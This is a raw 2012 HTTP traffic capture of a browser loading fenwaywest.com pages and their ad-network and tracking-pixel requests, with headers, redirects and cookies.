Host: ak1.abmr.net
GET /is/tag.contextweb.com?U=/TagPublish/GetAd.aspx&amp;V=3-aFY9YKHobFqvzZT2uBEmkP51UVeyIJyEhl6LJP49lekSmGz9u4J2Tqb24YtTu77L&amp;I=9AAB955FA98BAC4&amp;D=contextweb.com&amp;01AD=1&amp;tagver=1&amp;cp=520266&amp;ct=66902&amp;cn=1&amp;crtg=&amp;cwod=&amp;epid=&amp;esid=&amp;ifurl=&amp;tppg=&amp;cf=160X600&amp;rq=1&amp;dw=300&amp;cwu=http%3A%2F%2Fwww.88websitedesign.com%2Findex.php%3Fwebsite-design-and-development-services-web-company%3Dseo&amp;cwr=&amp;mrnd=87072411&amp;if=1&amp;tl=-1&amp;pxy=&amp;cxy=&amp;dxy=&amp;tz=-60&amp;ln=en-US HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
Cookie: 01AI=2-2-BD51635FC7AA020452B5F540D2FAED12EA3E177096E3AB259E22F179C980B977-06341518BF8819E33871A42AEFB3438D445CBE50CFCF8D0B70C101D174D98F1A
HTTP/1.1 302 Moved Temporarily

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://tag.contextweb.com/TagPublish/GetAd.aspx?01AD=3-a1bVT-F6HJlfJrS7NCZfQtTK0a0zp6fORVU9k057LWIC9-6ST6pzQ&amp;01RI=9AAB955FA98BAC4&amp;01NA=&amp;tagver=1&amp;cp=520266&amp;ct=66902&amp;cn=1&amp;crtg=&amp;cwod=&amp;epid=&amp;esid=&amp;ifurl=&amp;tppg=&amp;cf=160X600&amp;rq=1&amp;dw=300&amp;cwu=http%3A%2F%2Fwww.88websitedesign.com%2Findex.php%3Fwebsite-design-and-development-services-web-company%3Dseo&amp;cwr=&amp;mrnd=87072411&amp;if=1&amp;tl=-1&amp;pxy=&amp;cxy=&amp;dxy=&amp;tz=-60&amp;ln=en-US
Expires: Mon, 19 Nov 2012 04:17:37 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 19 Nov 2012 04:17:37 GMT
Connection: keep-alive
Set-Cookie: 01AI=2-2-251EBD5737DFC55DC72A75018A8ADC5805C64D103387BA6C9BEB4C3096BDE905-A33454D894CCF3EB6C8E1DDA174FDE60E6376925A315AC5E98A77A5BC6D3B7E4; expires=Tue, 19-Nov-2013 04:17:37 GMT; path=/; domain=.abmr.net
P3P: policyref=&quot;http://www.abmr.net/w3c/policy.xml&quot;, CP=&quot;NON DSP COR CURa ADMa DEVa OUR SAMa IND&quot;
GET /j/rolling.js HTTP/1.1

Host: a.adroll.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: text/javascript
x-amz-id-2: QKSimggnAltc8F8LbFM4LIqfe4l/VwaheIpt7lxX15B6DlvJj8SivkqgL+ITbMss
x-amz-request-id: A4C69E7251744F97
Last-Modified: Mon, 22 Oct 2012 17:37:36 GMT
Etag: &quot;be62be5d5cb71507ac08b35e19d545c7&quot;
Accept-Ranges: bytes
Content-Length: 11055
Server: AmazonS3
Cache-Control: must-revalidate, max-age=213
Date: Mon, 19 Nov 2012 04:17:37 GMT
Connection: keep-alive
GET /pagead/adview?ai=CzhxH4bKpUM6YEeKa6gGQwIGoBsn9_ssCoYaizzGhq_TujwEQASAAUIDH4cQEYMP0oYWQGIIBF2NhLXB1Yi03Mjc5NDEwMDQ4MDI0MjQ4yAEJqAMBqgRmT9CchwIRi1rCsoV_Qc6ZRIXIq1KY4HNUJrpVn-4GmGEqKxxRe_sfgLGAr1z44lE4iDa5fuucsUJrySdMeke-nyMjbjFOkmDMBhuqRlndXOvBXEoruVGI_PYirq6OKeDlLoliaIBl&sigh=Qdmt8lUFCRU HTTP/1.1

Host: adx.g.doubleclick.net
GET /pagead/adview?ai=CzhxH4bKpUM6YEeKa6gGQwIGoBsn9_ssCoYaizzGhq_TujwEQASAAUIDH4cQEYMP0oYWQGIIBF2NhLXB1Yi03Mjc5NDEwMDQ4MDI0MjQ4yAEJqAMBqgRmT9CchwIRi1rCsoV_Qc6ZRIXIq1KY4HNUJrpVn-4GmGEqKxxRe_sfgLGAr1z44lE4iDa5fuucsUJrySdMeke-nyMjbjFOkmDMBhuqRlndXOvBXEoruVGI_PYirq6OKeDlLoliaIBl&amp;sigh=Qdmt8lUFCRU HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
Cookie: id=223ae1776901005b||t=1350343758|et=730|cs=002213fd480aa30e9cef2f5d42
HTTP/1.1 200 OK

Content-Type: text/html; charset=UTF-8
P3P: policyref=&quot;http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml&quot;, CP=&quot;CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR&quot;
X-Content-Type-Options: nosniff
Date: Mon, 19 Nov 2012 04:17:37 GMT
Server: cafe
Content-Length: 0
X-XSS-Protection: 1; mode=block
GET /c/N34ZPOW5TRGMJKDEFHM2G4/U6PZANHGRBHQFBIDRUUZ3E/BQDGKMYTZBBJNGPJAOOVU7?no-cookies=1&pv=4115850208.214622&width=160&height=600&x=0&y=0&site_url=http://fenwaywest.com&cpm=UKmy4QAETE4KOo1iZQBgEB04waUCfEeJNuCoQw&adroll_network=g HTTP/1.1

Host: d.adroll.com
GET /c/N34ZPOW5TRGMJKDEFHM2G4/U6PZANHGRBHQFBIDRUUZ3E/BQDGKMYTZBBJNGPJAOOVU7?no-cookies=1&amp;pv=4115850208.214622&amp;width=160&amp;height=600&amp;x=0&amp;y=0&amp;site_url=http://fenwaywest.com&amp;cpm=UKmy4QAETE4KOo1iZQBgEB04waUCfEeJNuCoQw&amp;adroll_network=g HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 302 Moved Temporarily

HTTP/1.1 302 Moved Temporarily
Server: nginx/1.0.10
Date: Mon, 19 Nov 2012 04:17:37 GMT
Connection: keep-alive
Set-Cookie: __adroll=c978f251cca1d8734197a2f0e8ac3703; Version=1; Expires=Fri, 01-Jan-2021 00:00:00 GMT; Max-Age=432000000; Path=/
Pragma: no-cache
P3P: CP=&quot;NON DSP COR CURa PSA PSD OUR BUS NAV STA&quot;
Location: http://a.adroll.com/r/N34ZPOW5TRGMJKDEFHM2G4/U6PZANHGRBHQFBIDRUUZ3E/d578c155d932b53ac071e99e234c6043.js
Content-Length: 0
Cache-Control: no-store, no-cache, must-revalidate
GET /r/N34ZPOW5TRGMJKDEFHM2G4/U6PZANHGRBHQFBIDRUUZ3E/d578c155d932b53ac071e99e234c6043.js HTTP/1.1

Host: a.adroll.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: text/javascript
x-amz-id-2: JJHhhxMxzN+2j1WXno5KXPkbvTgr42O5+mxnN6mfTZwKpfFEOiAkFQMQoicwDsm7
x-amz-request-id: 9A55A1CC058DDEF2
Last-Modified: Fri, 28 Sep 2012 00:19:21 GMT
Etag: &quot;68f6c3b8a14e64ecb16e8b80f7f04c15&quot;
Accept-Ranges: bytes
Content-Length: 3606
Server: AmazonS3
Cache-Control: must-revalidate, max-age=45
Date: Mon, 19 Nov 2012 04:17:37 GMT
Connection: keep-alive
GET /a/XER/C7S/XERC7SMQKFB2FO6VTX75I5.jpg HTTP/1.1

Host: a.adroll.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: image/jpeg
x-amz-id-2: prXu+kMFlJRXym9ImnqIAcfjMMpF8zDMPX7HZR6fN4IsEYPlCPvOqLIPtO64kTIM
x-amz-request-id: B25F743D8EF8057D
Last-Modified: Thu, 27 Sep 2012 14:01:07 GMT
Etag: &quot;6dbfcf9a1b4f20df4b362c8ccfd8a9e4&quot;
Accept-Ranges: bytes
Content-Length: 18538
Server: AmazonS3
Cache-Control: must-revalidate, max-age=345477
Date: Mon, 19 Nov 2012 04:17:37 GMT
Connection: keep-alive
GET /surly.js?;ad_w=160;ad_h=600;ecaid=BQDGKMYTZBBJNGPJAOOVU7_XERC7SMQKFB2FO6VTX75I5_g;coid=412;nid=890; HTTP/1.1

Host: c.betrad.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Server: Apache
Etag: &quot;5f7cc9080cad02333445367dae64546d:1351006466&quot;
Last-Modified: Tue, 23 Oct 2012 15:34:26 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1028
Cache-Control: max-age=3600
Date: Mon, 19 Nov 2012 04:17:37 GMT
Connection: keep-alive
GET /a/4.gif HTTP/1.1

Host: c.betrad.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: image/gif
Server: Apache
Etag: &quot;65786c291a4603aa5150a1884452838d:1271351254&quot;
Last-Modified: Thu, 15 Apr 2010 17:07:29 GMT
Accept-Ranges: bytes
Content-Length: 43
Cache-Control: max-age=2144448000
Date: Mon, 19 Nov 2012 04:17:37 GMT
Connection: keep-alive
GET /pixel.gif HTTP/1.1

Host: load.s3.amazonaws.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://ads.pubmatic.com/AdServer/js/dppix.html?p=28596&amp;s=28597&amp;a=24361
HTTP/1.1 200 OK

Content-Type: image/gif
x-amz-id-2: HBUACJGVL/h4gztp79vWUuoldwGIzS2RtgXkZlcFUft8jt/Y7iGIIv3STW24XdRy
x-amz-request-id: 08B03830C69B9D39
Date: Mon, 19 Nov 2012 04:17:38 GMT
x-amz-meta-s3fox-filesize: 43
x-amz-meta-s3fox-modifiedtime: 1297679395316
Last-Modified: Mon, 14 Feb 2011 11:09:26 GMT
Etag: &quot;fc94fb0c3ed8a8f909dbc7630a0987ff&quot;
Accept-Ranges: bytes
Content-Length: 43
Server: AmazonS3
GET /geo/ba.js?r756 HTTP/1.1

Host: c.betrad.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Server: Apache
Etag: &quot;e61b605b626fdc5543229494600ba1d0:1351006969&quot;
Last-Modified: Tue, 23 Oct 2012 15:42:49 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 12039
Cache-Control: max-age=315360000
Date: Mon, 19 Nov 2012 04:17:37 GMT
Connection: keep-alive
GET /a/n/412/890.js HTTP/1.1

Host: c.betrad.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Server: Apache
Etag: &quot;6f6fb5988b707ce61af86edd8cb132c5:1346447609&quot;
Last-Modified: Fri, 31 Aug 2012 21:13:29 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 824
Cache-Control: max-age=600
Date: Mon, 19 Nov 2012 04:17:37 GMT
Connection: keep-alive
GET /TagPublish/GetAd.aspx?01AD=3-a1bVT-F6HJlfJrS7NCZfQtTK0a0zp6fORVU9k057LWIC9-6ST6pzQ&01RI=9AAB955FA98BAC4&01NA=&tagver=1&cp=520266&ct=66902&cn=1&crtg=&cwod=&epid=&esid=&ifurl=&tppg=&cf=160X600&rq=1&dw=300&cwu=http%3A%2F%2Fwww.88websitedesign.com%2Findex.php%3Fwebsite-design-and-development-services-web-company%3Dseo&cwr=&mrnd=87072411&if=1&tl=-1&pxy=&cxy=&dxy=&tz=-60&ln=en-US HTTP/1.1

Host: tag.contextweb.com
GET /TagPublish/GetAd.aspx?01AD=3-a1bVT-F6HJlfJrS7NCZfQtTK0a0zp6fORVU9k057LWIC9-6ST6pzQ&amp;01RI=9AAB955FA98BAC4&amp;01NA=&amp;tagver=1&amp;cp=520266&amp;ct=66902&amp;cn=1&amp;crtg=&amp;cwod=&amp;epid=&amp;esid=&amp;ifurl=&amp;tppg=&amp;cf=160X600&amp;rq=1&amp;dw=300&amp;cwu=http%3A%2F%2Fwww.88websitedesign.com%2Findex.php%3Fwebsite-design-and-development-services-web-company%3Dseo&amp;cwr=&amp;mrnd=87072411&amp;if=1&amp;tl=-1&amp;pxy=&amp;cxy=&amp;dxy=&amp;tz=-60&amp;ln=en-US HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
Cookie: C2W4=CT-1; cw=cw
HTTP/1.1 200 OK

Content-Type: application/x-javascript;charset=utf-8
Server: GlassFish v3
P3P: policyref=&quot;/TagPublish/w3c/p3p.xml&quot;, CP=&quot;NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT&quot;, policyref=&quot;/w3c/p3p.xml&quot;, CP=&quot;NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT&quot;
Cache-Control: private, max-age=0, no-cache, no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
CWDL: 12/120
CW-Server: LGA-APP213
Content-Encoding: gzip
Date: Mon, 19 Nov 2012 04:17:38 GMT
Content-Length: 891
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: C2W4=3-a1bVT-F6HJlfJrS7NCZfQtTK0a0zp6fORVU9k057LWIC9-6ST6pzQ; expires=Mon, 17-Dec-2012 04:17:37 GMT; path=/; domain=.contextweb.com 66902_160X600__POSUNKNOWNXUNKNOWN=EMPTY; Domain=.contextweb.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ 66902_160X600__POSUNKNOWNXUNKNOWN=1353298784332; Domain=.contextweb.com; Expires=Mon, 19-Nov-2012 04:19:54 GMT; Path=/ V=Cp3qDslEoSFB; Domain=.contextweb.com; Expires=Thu, 14-Nov-2013 04:19:44 GMT; Path=/ vf=1; Domain=.contextweb.com; Expires=Mon, 19-Nov-2012 05:00:00 GMT; Path=/ wf=0; Domain=.contextweb.com; Expires=Sun, 25-Nov-2012 05:00:00 GMT; Path=/
GET /beacon.js HTTP/1.1

Host: b.scorecardresearch.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
Cookie: UID=a2978d-195.159.219.9-1353298656; UIDR=1353298656
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Encoding: gzip
Expires: Mon, 03 Dec 2012 04:17:38 GMT
Date: Mon, 19 Nov 2012 04:17:38 GMT
Content-Length: 1140
Connection: keep-alive
Cache-Control: private, no-transform, max-age=1209600
GET /b?c1=8&c2=2102&c3=0&c4=&c5=&c15=&c16=&ns__t=1353298658120&ns_c=UTF-8&c8=http%3A%2F%2Fwww.fenwaywest.com%2Findex.php%3Foption%3Dcom_content%26amp%3Bview%3Darticle%26amp%3Bid%3D7%26amp%3BItemid%3D101&c7=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&c9=http%3A%2F%2Fwww.88websitedesign.com%2Findex.php%3Fwebsite-design-and-development-services-web-company%3Dseo HTTP/1.1

Host: b.scorecardresearch.com
GET /b?c1=8&amp;c2=2102&amp;c3=0&amp;c4=&amp;c5=&amp;c15=&amp;c16=&amp;ns__t=1353298658120&amp;ns_c=UTF-8&amp;c8=http%3A%2F%2Fwww.fenwaywest.com%2Findex.php%3Foption%3Dcom_content%26amp%3Bview%3Darticle%26amp%3Bid%3D7%26amp%3BItemid%3D101&amp;c7=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;c9=http%3A%2F%2Fwww.88websitedesign.com%2Findex.php%3Fwebsite-design-and-development-services-web-company%3Dseo HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
Cookie: UID=a2978d-195.159.219.9-1353298656; UIDR=1353298656
HTTP/1.1 204 No Content

HTTP/1.1 204 No Content
Content-Length: 0
Date: Mon, 19 Nov 2012 04:17:38 GMT
Connection: keep-alive
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
GET /pixel/p-01-0VIaSjnOLg.gif?tags=CONTEXTWEB.UNCONTEXTUALIZED,PUBLISHER.520266,,CAMPAIGN..0,,ADSIZE.160X600 HTTP/1.1

Host: pixel.quantserve.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
Cookie: mc=50a9b2e0-21a09-68164-7c0b5
HTTP/1.1 200 OK

Content-Type: image/gif
Connection: close
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 35
Date: Mon, 19 Nov 2012 04:17:38 GMT
Server: QS
GET /creatives/BackupTags/520266/00259a8d-0f3c-4e40-8e92-68482cb19d04Lijit_Scraper..html HTTP/1.1

Host: akamai-media.contextweb.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
Cookie: C2W4=3-a1bVT-F6HJlfJrS7NCZfQtTK0a0zp6fORVU9k057LWIC9-6ST6pzQ; cw=cw; 66902_160X600__POSUNKNOWNXUNKNOWN=1353298784332; V=Cp3qDslEoSFB; vf=1; wf=0
HTTP/1.1 200 OK

Content-Type: text/html
Last-Modified: Tue, 25 Sep 2012 16:55:42 GMT
Accept-Ranges: bytes
Etag: &quot;0bbf3983e9bcd1:0&quot;
Server: Microsoft-IIS/7.5
CW-Server: lga-app1301
ntCoent-Length: 140
P3P: policyref=&quot;/w3c/p3p.xml&quot;, CP=&quot;NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT&quot;
Content-Encoding: gzip
Content-Length: 140
Vary: Accept-Encoding
Cache-Control: private, max-age=658
Date: Mon, 19 Nov 2012 04:17:38 GMT
Connection: keep-alive
GET /templates/yoo_bigeasy/images/module_transparent.png HTTP/1.1

Host: www.fenwaywest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.fenwaywest.com/templates/yoo_bigeasy/css/modules.css
Cookie: __qca=P0-1109205847-1353298656085; cto_rtt=; UnicaNIODID=iYQ8T442WFr-XzLhPSG
HTTP/1.1 200 OK

Content-Type: image/png
Date: Mon, 19 Nov 2012 04:17:38 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Thu, 28 Jun 2012 12:20:02 GMT
Etag: &quot;eccb35-63-4c38759d56080&quot;
Accept-Ranges: bytes
Content-Length: 99
Keep-Alive: timeout=5, max=497
Connection: Keep-Alive
GET /delivery/fp?u=bloguin&z=95032&n=1 HTTP/1.1

Host: www.lijit.com
GET /delivery/fp?u=bloguin&amp;z=95032&amp;n=1 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://akamai-media.contextweb.com/creatives/BackupTags/520266/00259a8d-0f3c-4e40-8e92-68482cb19d04Lijit_Scraper..html
HTTP/1.1 200 OK

Content-Type: text/javascript
Date: Mon, 19 Nov 2012 04:17:38 GMT
Server: PWS/8.0.9.6
X-Px: ht h0-s14.p1-arn.cdngp.net
Cache-Control: max-age=7200
Expires: Mon, 19 Nov 2012 05:10:46 GMT
Age: 4012
Content-Length: 6879
Content-Encoding: gzip
Vary: Accept-Encoding
Connection: keep-alive
GET /p?c1=8&c2=3005693&c3=13&c4=&c5=&c6=&c15=&cv=2.0&cj=1&ljt_r=54392378 HTTP/1.1

Host: b.scorecardresearch.com
GET /p?c1=8&amp;c2=3005693&amp;c3=13&amp;c4=&amp;c5=&amp;c6=&amp;c15=&amp;cv=2.0&amp;cj=1&amp;ljt_r=54392378 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://akamai-media.contextweb.com/creatives/BackupTags/520266/00259a8d-0f3c-4e40-8e92-68482cb19d04Lijit_Scraper..html
Cookie: UID=a2978d-195.159.219.9-1353298656; UIDR=1353298656
HTTP/1.1 200 OK

Content-Type: image/gif
Content-Length: 43
Date: Mon, 19 Nov 2012 04:17:38 GMT
Connection: keep-alive
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
GET /pixel/p-56WJ0KtIxWJ_2.gif?r=0.7494797411318996 HTTP/1.1

Host: pixel.quantserve.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://akamai-media.contextweb.com/creatives/BackupTags/520266/00259a8d-0f3c-4e40-8e92-68482cb19d04Lijit_Scraper..html
Cookie: mc=50a9b2e0-21a09-68164-7c0b5
HTTP/1.1 200 OK

Content-Type: image/gif
Connection: close
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 35
Date: Mon, 19 Nov 2012 04:17:38 GMT
Server: QS
GET /bh/visitormatch?tag=66902&pid=520266 HTTP/1.1

Host: bh.contextweb.com
GET /bh/visitormatch?tag=66902&amp;pid=520266 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
Cookie: C2W4=3-a1bVT-F6HJlfJrS7NCZfQtTK0a0zp6fORVU9k057LWIC9-6ST6pzQ; cw=cw; 66902_160X600__POSUNKNOWNXUNKNOWN=1353298784332; V=Cp3qDslEoSFB; vf=1; wf=0
HTTP/1.1 200 OK

Content-Type: text/html;charset=ISO-8859-1
Cache-Control: private, max-age=0, no-cache, no-store
Content-Language: en-US
CW-Server: ip-10-79-5-121
Date: Mon, 19 Nov 2012 04:17:37 GMT
Expires: -1
P3P: policyref=&quot;/bh/w3c/p3p.xml&quot;, CP=&quot;NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT&quot;
Server: GlassFish v3
Set-Cookie: V=Cp3qDslEoSFB; Domain=.contextweb.com; Expires=Thu, 14-Nov-2013 04:17:38 GMT; Path=/ pb_rtb_ev=2-535461..0.0.1353298658421|530731..0.0.1353298658421|531399..0.0.1353298658421|530912..0.0.1353298658421|535495..0.0.1353298658421|540281..0.0.1353298658421|534301..0.0.1353298658421|535393..0.0.1353298658421|541254..0.0.1353298658421|537085..0.0.1353298658421|543921..0.0.1353298658421|536088..0.0.1353298658421|538569..0.0.1353298658421|545979..0.0.1353298658421|531292..0.0.1353298658421|543604..0.0.1353298658421|535039..0.0.1353298658421|530739..0.0.1353298658421|537583..0.0.1353298658421|547259..0.0.1353298658421; Domain=.contextweb.com; Expires=Tue, 19-Nov-2013 04:17:38 GMT; Path=/
Transfer-Encoding: chunked
Connection: keep-alive
GET /adj/yb.fenwaywest/;chan1=mlb;rating=pg;dcopt=;yb=ad;s1=;s2=;tile=3;sz=300x250;ord=5887935212? HTTP/1.1

